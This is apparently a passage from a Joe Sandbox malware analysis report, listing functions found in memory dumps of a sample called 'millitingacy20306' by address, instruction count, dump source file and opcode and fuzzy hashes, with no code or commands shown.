                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 084fe891f5a6bf09f9aaf03ae477bfdf2d5008aace9762d7af599e615438583d
                                                                                                              • Instruction ID: 193f01c59061b86f2be973af25be3e19af04cf9087b782ef93b7ac342f7bcdef
                                                                                                              • Opcode Fuzzy Hash: 084fe891f5a6bf09f9aaf03ae477bfdf2d5008aace9762d7af599e615438583d
                                                                                                              • Instruction Fuzzy Hash: B9918F79D00218CFE714AFA1D89C7EEBBB5EB4A312F10541AD502772E5CB785A88CF58
                                                                                                              Function 00C55F38 Relevance: .2, Instructions: 247COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac463cf6d77d1e4503ac647cc5eeb6c1527cfc3b8cf25f000dd06166298de73c
                                                                                                              • Instruction ID: 7d6bbb8d7fd449156b034f7a0f4164fe6170e9050bb90186c5da39beae266685
                                                                                                              • Opcode Fuzzy Hash: ac463cf6d77d1e4503ac647cc5eeb6c1527cfc3b8cf25f000dd06166298de73c
                                                                                                              • Instruction Fuzzy Hash: EE918079D00218CFE714AFA1D89C7EEBBB5EB4A312F10541AD502772E5CBB85A84CF58
                                                                                                              Function 003D8100 Relevance: .2, Instructions: 225COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b2cced942b2a7989487cc40b0fe382d1e9f27d27238d9a7f406ec45b6778c64e
                                                                                                              • Instruction ID: a8ed3fcd11def77d583692a163bf46dcf93423a979f622b612b1f7ccd211ad1e
                                                                                                              • Opcode Fuzzy Hash: b2cced942b2a7989487cc40b0fe382d1e9f27d27238d9a7f406ec45b6778c64e
                                                                                                              • Instruction Fuzzy Hash: 8AA1A375E012198FEB68DF6AD944BDDBBF2AF89300F14C1AAD40CA7250DB345A85CF11
                                                                                                              Function 003D9330 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d41b1d29168f17e8d004b672dd14d3b4c9b78a0e7236ae39f3758ab344ce9df
                                                                                                              • Instruction ID: 6b803aaa08da3dcc871a712fdf721cee66548df0dc3d52586a7fa06d54de0ab2
                                                                                                              • Opcode Fuzzy Hash: 8d41b1d29168f17e8d004b672dd14d3b4c9b78a0e7236ae39f3758ab344ce9df
                                                                                                              • Instruction Fuzzy Hash: A1A10670D00218CFEB14DFA5D994BDDBBB1BF89314F20826AE409A7391DB749985CF51
                                                                                                              Function 00C550D8 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c65183bfe6a7f24151578a37c834e395ce9a0a1e02fc26655b70b1c943eda9de
                                                                                                              • Instruction ID: 16e28c98870fa9201b8d42115c8646a3b3c38c5b5f24823d403b9059d3dfe777
                                                                                                              • Opcode Fuzzy Hash: c65183bfe6a7f24151578a37c834e395ce9a0a1e02fc26655b70b1c943eda9de
                                                                                                              • Instruction Fuzzy Hash: 4BA1A374E016288FEB68CF6AC954B9DBBF2AF89301F14C1AAD40CA7250DB745A85CF15
                                                                                                              Function 00C549F8 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0fcc26ece00d76786c50f3822e4ad81eee521290893ba4ce2edc0ef6c700236a
                                                                                                              • Instruction ID: 2c1fc12bf56db4c7cb506b9276576c6598ffb9683ea710191130bb4bd360e8c3
                                                                                                              • Opcode Fuzzy Hash: 0fcc26ece00d76786c50f3822e4ad81eee521290893ba4ce2edc0ef6c700236a
                                                                                                              • Instruction Fuzzy Hash: B7A1A574E012188FEB68CF6AC984B9DFBF2AF89301F14C1AAD408A7250DB745AC5CF55
                                                                                                              Function 00C52E78 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c8e769ffbb62ad8b36396f287be84a4108db5e37744276b36a367226c6cde587
                                                                                                              • Instruction ID: 3e527488024577ba26ccb3c606992521e069f5a300aff4911e379e9889186c2c
                                                                                                              • Opcode Fuzzy Hash: c8e769ffbb62ad8b36396f287be84a4108db5e37744276b36a367226c6cde587
                                                                                                              • Instruction Fuzzy Hash: 40A1A474E012188FEB68CF6AC944B9DFBF2BF89301F14C1AAD408A7250DB745A85CF15
                                                                                                              Function 00C54318 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f11b3cbd5a054b9608cc424d57983d8eb38ddc0845ed13304163bf897a88315
                                                                                                              • Instruction ID: 22d9ce30e8b576f6bf0a0067ccd60cc3bc2e0078651954d044d1813ac33c3eec
                                                                                                              • Opcode Fuzzy Hash: 0f11b3cbd5a054b9608cc424d57983d8eb38ddc0845ed13304163bf897a88315
                                                                                                              • Instruction Fuzzy Hash: 97A1A375E012188FEB68CF6AC944B9DFBF2AF89305F14C1AAD408A7250DB345AC5CF55
                                                                                                              Function 00C53C38 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10256106c9e1e3f50d5007a6a21df1747f1dd2b6429031bb00af8649b5b9f2e6
                                                                                                              • Instruction ID: 1ff57529b4e3efa7c424588c4f9799a5af679e7bc1991e54fbd28d46afd878ba
                                                                                                              • Opcode Fuzzy Hash: 10256106c9e1e3f50d5007a6a21df1747f1dd2b6429031bb00af8649b5b9f2e6
                                                                                                              • Instruction Fuzzy Hash: E8A19575E012288FEB68CF6AC984B9DFBF2BF89301F14C1A9D408A7250DB745A85CF55
                                                                                                              Function 00C557B8 Relevance: .2, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e761a4e9b5732dafc793ab512746df8490fb7a3f1e98e70d3ac9ffd21edd18c7
                                                                                                              • Instruction ID: bdc182420cbea1e8cd264945ee4575a697e9c9899b83b4f244a72ea6fcab4a9e
                                                                                                              • Opcode Fuzzy Hash: e761a4e9b5732dafc793ab512746df8490fb7a3f1e98e70d3ac9ffd21edd18c7
                                                                                                              • Instruction Fuzzy Hash: 22A1A374E01618CFEB68CF6AC994B9DFBF2AF89301F14C1AAD408A7250DB745A85CF15
                                                                                                              Function 00C53558 Relevance: .2, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76a87ff9d84457e9958b91b0ddd9c115fd6c1e564ea1217420579767f4ff7c74
                                                                                                              • Instruction ID: 7349cb7328d75101c91c7f74b5bd0f41df537d84470212e987ead7cd16b17418
                                                                                                              • Opcode Fuzzy Hash: 76a87ff9d84457e9958b91b0ddd9c115fd6c1e564ea1217420579767f4ff7c74
                                                                                                              • Instruction Fuzzy Hash: C6A1A5B5E012188FEB68CF6AC944B9DFBF2AF89301F14C1AAD40CA7250DB745A85CF55
                                                                                                              Function 003D9672 Relevance: .2, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 129e0d7c1c0f6e0ae18bfacca52c2573246a6d3b0aeb09759a34351736bc5056
                                                                                                              • Instruction ID: a872ff8be11ca849d0640b05fffa9e05fb07db52fb4b3019f227d3e271ab2273
                                                                                                              • Opcode Fuzzy Hash: 129e0d7c1c0f6e0ae18bfacca52c2573246a6d3b0aeb09759a34351736bc5056
                                                                                                              • Instruction Fuzzy Hash: E191F370D00218CFEB11DFA5D984BDDBBB1BF49314F2082AAE409AB392DB759985CF15
                                                                                                              Function 0073A120 Relevance: .2, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951329859.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_730000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 585462368cd15fe56dd0ff666fd81c0f8fb15ee8de03e74d45363ebef5e7e225
                                                                                                              • Instruction ID: 08ccfa6df0a99e66e598926dbf62fe96c53f671c180c0ff53d1bb5d6a74aa620
                                                                                                              • Opcode Fuzzy Hash: 585462368cd15fe56dd0ff666fd81c0f8fb15ee8de03e74d45363ebef5e7e225
                                                                                                              • Instruction Fuzzy Hash: C281D174E002188FEB14DFA9C881BADBBB2FF89300F608529D415BB399DB356942CF50
                                                                                                              Function 00C5354B Relevance: .2, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07d1898f0c11fd9d674f99267a4e534d69941a24e0fae88f8bcd1c6bbcb180d5
                                                                                                              • Instruction ID: 57f694f01b1aff0854feb56ad96874a7efddd90070404c907617bde498855cf8
                                                                                                              • Opcode Fuzzy Hash: 07d1898f0c11fd9d674f99267a4e534d69941a24e0fae88f8bcd1c6bbcb180d5
                                                                                                              • Instruction Fuzzy Hash: 1E81A5B5E012188FEB68CF6AC954B9DFBF2AF89300F14C1AAD40CA7254DB745A85CF54
                                                                                                              Function 00C557A8 Relevance: .2, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 032d0b7ac147e1981d915e5ce9a07301ab29d38f9dbe103bc2b144be84080be2
                                                                                                              • Instruction ID: f98f3a2e3bffea9ef27f2356806837f5be6fadc2d87555d6bcdbd0fdb716f96e
                                                                                                              • Opcode Fuzzy Hash: 032d0b7ac147e1981d915e5ce9a07301ab29d38f9dbe103bc2b144be84080be2
                                                                                                              • Instruction Fuzzy Hash: 0D71A470E016288FEB68CF6AC954B9EBAF2AF89300F14C1A9D408A7254DB745A85CF50
                                                                                                              Function 003D5D00 Relevance: .1, Instructions: 147COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1b4662508d39aa3651f80eed3bfe0ab8c2f44b7b823d1dfd85a5c37d81e50e2
                                                                                                              • Instruction ID: 3aae20e132ed35df03150b591671de23471a6b9d010348d7dd1a08bf265d1d7f
                                                                                                              • Opcode Fuzzy Hash: c1b4662508d39aa3651f80eed3bfe0ab8c2f44b7b823d1dfd85a5c37d81e50e2
                                                                                                              • Instruction Fuzzy Hash: 2451C775E00218DFEB18DFA6D894A9DFBB2FF89300F24942AE815AB365DB315941CF50
                                                                                                              Function 00C54308 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87decc8cc07af45ae24a46376c9df9db8ec2f0c9380ed5d8bcda015563baf972
                                                                                                              • Instruction ID: 8380cffe339f1a8d11404e325ed2c35b68cf75a45b1c7cfb2029666c3004138a
                                                                                                              • Opcode Fuzzy Hash: 87decc8cc07af45ae24a46376c9df9db8ec2f0c9380ed5d8bcda015563baf972
                                                                                                              • Instruction Fuzzy Hash: FF417871E016588FEB68CF6BD95479EFAF3AFC9204F14C1AAC40CAA254DB340A858F51
                                                                                                              Function 00C52E68 Relevance: .1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a832efc482adc055cfeb0de0cfdad9e090f04be9eab0619327f3e6cb4c529626
                                                                                                              • Instruction ID: ea9980cb75d89d2209957790aa84e77af219606ffd9d3a3ddba2c1fc35e34711
                                                                                                              • Opcode Fuzzy Hash: a832efc482adc055cfeb0de0cfdad9e090f04be9eab0619327f3e6cb4c529626
                                                                                                              • Instruction Fuzzy Hash: 0E418A71E016588FEB28CF6BC95479EFAF3AFC9300F14C1AAD40CA6254EB741A858F51
                                                                                                              Function 00C53C28 Relevance: .1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea2e0eaf56243771052842bd88dedd1f6de7386b85589724b415d236766b98d5
                                                                                                              • Instruction ID: c64a5dc88b712a1a7139fade3230ced5d95a2a88306aade19e942cddd44d96b1
                                                                                                              • Opcode Fuzzy Hash: ea2e0eaf56243771052842bd88dedd1f6de7386b85589724b415d236766b98d5
                                                                                                              • Instruction Fuzzy Hash: BB418A71E016588FEB28CF6BC95479EFAF3AFC9300F14C1AAC40CA6254EB740A858F51
                                                                                                              Function 00C550C8 Relevance: .1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0bd4d0a3c6d7e72c3d9dc2c18096e54d837e390bdf2509af8007b7e764c5513
                                                                                                              • Instruction ID: d9f0b1b146c2af4a486346e6023d213a5e1d62d552c7b498a602caa56e5806ed
                                                                                                              • Opcode Fuzzy Hash: a0bd4d0a3c6d7e72c3d9dc2c18096e54d837e390bdf2509af8007b7e764c5513
                                                                                                              • Instruction Fuzzy Hash: 49417871D016188FEB28CF6BC85479EFAF3AFC9300F14C1AAC40CA6254EB741A858F51
                                                                                                              Function 00C549E9 Relevance: .1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e168f0c77c0137486468dee57fd397c4b7e7eb3a5984415ca034a3f5d715b17
                                                                                                              • Instruction ID: a94f81a845b63526817dfdd1d16b7d4f8ec05962e4fa05625db24b279d9e72ea
                                                                                                              • Opcode Fuzzy Hash: 4e168f0c77c0137486468dee57fd397c4b7e7eb3a5984415ca034a3f5d715b17
                                                                                                              • Instruction Fuzzy Hash: E3418971E016188FEB68CF6BC95479EFAF3AFC9300F14C1AAD50CA6254EB740A858F55
                                                                                                              Function 008B68DA Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951353749.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_8b0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1939e782fc1760643368956d7689dcc2c5f7640f3986116404297243702a89e3
                                                                                                              • Instruction ID: 18b817c1f6c12b8d2078bf5f59046f0baf6711678118d076314dd3a8c83aecc4
                                                                                                              • Opcode Fuzzy Hash: 1939e782fc1760643368956d7689dcc2c5f7640f3986116404297243702a89e3
                                                                                                              • Instruction Fuzzy Hash: 9841E370D012488FEB18DFA6C9546DEBBB2FF89300F24D12AD419AB255EB385946CF54
                                                                                                              Function 006195C0 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951308350.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_610000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7ae3266fb4bb028694ba7fc5cf54cfa36575fc2708f7aabadedb03568ce1830
                                                                                                              • Instruction ID: 799e67fded231b575f59d533390c6ee6dc5b1e90b5d62a017223e382444fe44d
                                                                                                              • Opcode Fuzzy Hash: a7ae3266fb4bb028694ba7fc5cf54cfa36575fc2708f7aabadedb03568ce1830
                                                                                                              • Instruction Fuzzy Hash: A641E370E012188FDB18DFAAD8A46DEBBF2BF89300F14D06AD418BB294DB355946CF50
                                                                                                              Function 003D5390 Relevance: .6, Instructions: 647COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b2489980011efcb59b14f9d353267208a531833b955c51f6064382042dcb2668
                                                                                                              • Instruction ID: e542b0447348d40e8236ce4f318e46bc7d72cb7e5aa5a823ffaadb034a809ebd
                                                                                                              • Opcode Fuzzy Hash: b2489980011efcb59b14f9d353267208a531833b955c51f6064382042dcb2668
                                                                                                              • Instruction Fuzzy Hash: A612887462164B8FA3042F74AEBC92EBB71FB4F36B705AD04B50BC04619F7D1489DA62
                                                                                                              Function 003D0798 Relevance: .6, Instructions: 624COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8d76ab67468c72cd70e1213335601dae915492f704b6e7ac0b697706b5b2e2f
                                                                                                              • Instruction ID: 4403c8327c0ab9dda9568454486fd0e37e54b890cd3f66a792bc4316b2fb1488
                                                                                                              • Opcode Fuzzy Hash: d8d76ab67468c72cd70e1213335601dae915492f704b6e7ac0b697706b5b2e2f
                                                                                                              • Instruction Fuzzy Hash: 58622678A04329CFDB55EF64E894B8EBBB1BF49301F1046A5D50AAB314EB306E85CF51
                                                                                                              Function 003D0848 Relevance: .5, Instructions: 539COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951224728.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_3d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32dc5dcb6d9000c3c1b17a6a3e3f7930a049cc9977a59bb9ebd133ea32e002b7
                                                                                                              • Instruction ID: e525de5ec18f5da85a952405822ce5f8a2f35c3274a1a9f29cc089df8321e072
                                                                                                              • Opcode Fuzzy Hash: 32dc5dcb6d9000c3c1b17a6a3e3f7930a049cc9977a59bb9ebd133ea32e002b7
                                                                                                              • Instruction Fuzzy Hash: 0A52E778A00229CFDB54EF64E994B8EBBB5FB49301F1046A9D50EA7314EB306E85CF51
                                                                                                              Function 00C50006 Relevance: .2, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951381120.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_c50000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f408bb72cce8c171442375843631ac83908afb3a8b16f9843f0a9d521756be83
                                                                                                              • Instruction ID: d5bba1408c8167e145905000224d6ad5a4df015adf0329ba1b64cd18f8bd9768
                                                                                                              • Opcode Fuzzy Hash: f408bb72cce8c171442375843631ac83908afb3a8b16f9843f0a9d521756be83
                                                                                                              • Instruction Fuzzy Hash: A391F574E452688FDB65DF69DC91BDDBBB2AF8A300F1080EAD948A7251DB305E85CF40
                                                                                                              Function 005FBE28 Relevance: .2, Instructions: 171COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951292089.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_5f0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d37f161a6dd445be419d01d2ddfeb24085028320c067098f96b8380616573c8
                                                                                                              • Instruction ID: ec3de8c87467e3d2bdd673e64b33a6ff0d619fbfa78a6a1504234c2d6d02d85c
                                                                                                              • Opcode Fuzzy Hash: 8d37f161a6dd445be419d01d2ddfeb24085028320c067098f96b8380616573c8
                                                                                                              • Instruction Fuzzy Hash: 9971D174E00218CFDB14DFA6C990AADBBB2FF89300F648529D515BB359DB35A942CF50
                                                                                                              Function 005F9320 Relevance: .2, Instructions: 171COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951292089.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_5f0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 114e28d579c7c952c6136b9f39f1db7edb237d07ae410705cbd2bb8ff0f0f173
                                                                                                              • Instruction ID: 32b35d1f6ead492cdc858abcd6dd8a40eeb3cf40836ab9063f512845d462acb6
                                                                                                              • Opcode Fuzzy Hash: 114e28d579c7c952c6136b9f39f1db7edb237d07ae410705cbd2bb8ff0f0f173
                                                                                                              • Instruction Fuzzy Hash: 2471D074E002188FDB14DFAAC990BADBBB2FF89300F648529D415BB359DB35A942CF50
                                                                                                              Function 00733E68 Relevance: .2, Instructions: 171COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.951329859.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_730000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 642e0dd8ed4222ffb6574ceac610b3a3a91bc9a1d315fede69c5d375fb891251
